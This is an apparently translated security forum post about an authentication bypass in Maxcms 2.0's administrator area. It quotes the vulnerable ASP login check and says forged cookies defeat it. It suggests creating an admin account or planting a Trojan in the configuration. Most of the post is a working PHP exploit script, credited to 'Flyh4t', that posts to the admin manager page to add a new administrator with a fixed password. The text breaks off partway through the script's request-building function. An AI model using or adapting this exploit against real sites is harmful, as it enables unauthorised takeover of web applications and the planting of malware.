Maxcms administrator Authentication Bypass Vulnerability

The maxcms background has an automatic upgrade function. The ajax injection is fixed, but this vulnerability is not fixed yet. In the previous post, a student asked if the authentication could be bypassed. The answer is yes, but the premise is that you need to know the background directory address to review the vulnerability code SubcheckPowerdimloginValidate, rsObj: loginValidatemaxcms2.0err. clear.

The maxcms background has an automatic upgrade function. The ajax injection is fixed, but this vulnerability is not fixed yet.
I posted a post asking if I can bypass the authentication. The answer is yes, but the premise is that I need to know the background directory address.

Review the vulnerability code

 
 

  
  
Sub checkPower  
  
  
    dim loginValidate,rsObj : loginValidate = "maxcms2.0" 
  
  
    err.clear  
  
  
    on error resume next  
  
  
    set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username=\'"&rCookie("m_username")&"\'","execute")  
  
  
    loginValidate = md5(getAgent&getIp&rsObj(0))  
  
  
    if err then wCookie "check"&rCookie("m_username"),"" : die "《script》top.location.href=\'index.asp?action=login\';《script》" 
  
  
    if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die "《script》top.location.href=\'index.asp?action=login\';《script》" 
  
  
    checkManagerLevel  rsObj(1)  
  
  
    set rsObj=nothing  
  
  
End Sub 
 
 

Where

 
 

  
  
Function rCookie(cookieName)  
  
  
    rCookie = request.cookies(cookieName)  
  
  
End Function 
 
 

The key is that the value of this variable is loginValidate = md5 (getAgent & getIp & rsObj (0 ))
You can easily bypass this authentication code through cookie forgery. Then you can add a new Administrator or modify the configuration file to insert a Trojan

Here I will post an exp for adding a new Administrator.

 

 
 

  
  
 php  
  
  
print_r(\'  
  
  
+---------------------------------------------------------------------------+  
  
  
maxcms2.0 creat new admin exploit  
  
  
by Flyh4t  
  
  
team:wolvez security team  
  
  
site:bbs.wolvez.org  
  
  
dork:salemax#qq.com  
  
  
+---------------------------------------------------------------------------+  
  
  
\');  
  
  
 
  
  
if ($argc < 3) {  
  
  
    print_r(\'  
  
  
+---------------------------------------------------------------------------+  
  
  
Usage: php \'.$argv[0].\' host path  
  
  
host:      target server (ip/hostname)  
  
  
path:      path to maxcms  
  
  
Example:  
  
  
php \'.$argv[0].\' localhost /maxcms2/   
  
  
+---------------------------------------------------------------------------+  
  
  
\');  
  
  
    exit;  
  
  
}  
  
  
 
  
  
error_reporting(7);  
  
  
ini_set(\'max_execution_time\', 0);  
  
  
 
  
  
$host = $argv[1];  
  
  
$path = $argv[2];  
  
  
$name = rand(1,10000);  
  
  
$cmd = \'m_username=flyh4t\'.$name.\'&m_pwd=wolvez&m_pwd2=wolvez&m_level=0\';  
  
  
 
  
  
$resp = send($cmd);  
  
  
if (!eregi(\'alert\',$resp)) {echo"[~]bad luck,exploit failed";exit;}  
  
  
 
  
  
print_r(\'  
  
  
+----------------------------------------------------- 
  
  
[+]cool,exploit seccuss  
  
  
[+]you have add a new adminuser flyh4t\'.$name.\'/wolvez  
  
  
+--------------------------------------------------------
  
  
\');  
  
  
 
  
  
 
  
  
function send($cmd)  
  
  
{  
  
  
    global $host, $path;  
  
  
    $message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1rn";  
  
  
    $message .= "Accept: */*rn";  
  
  
    $message .= "Referer: http://$host$pathrn"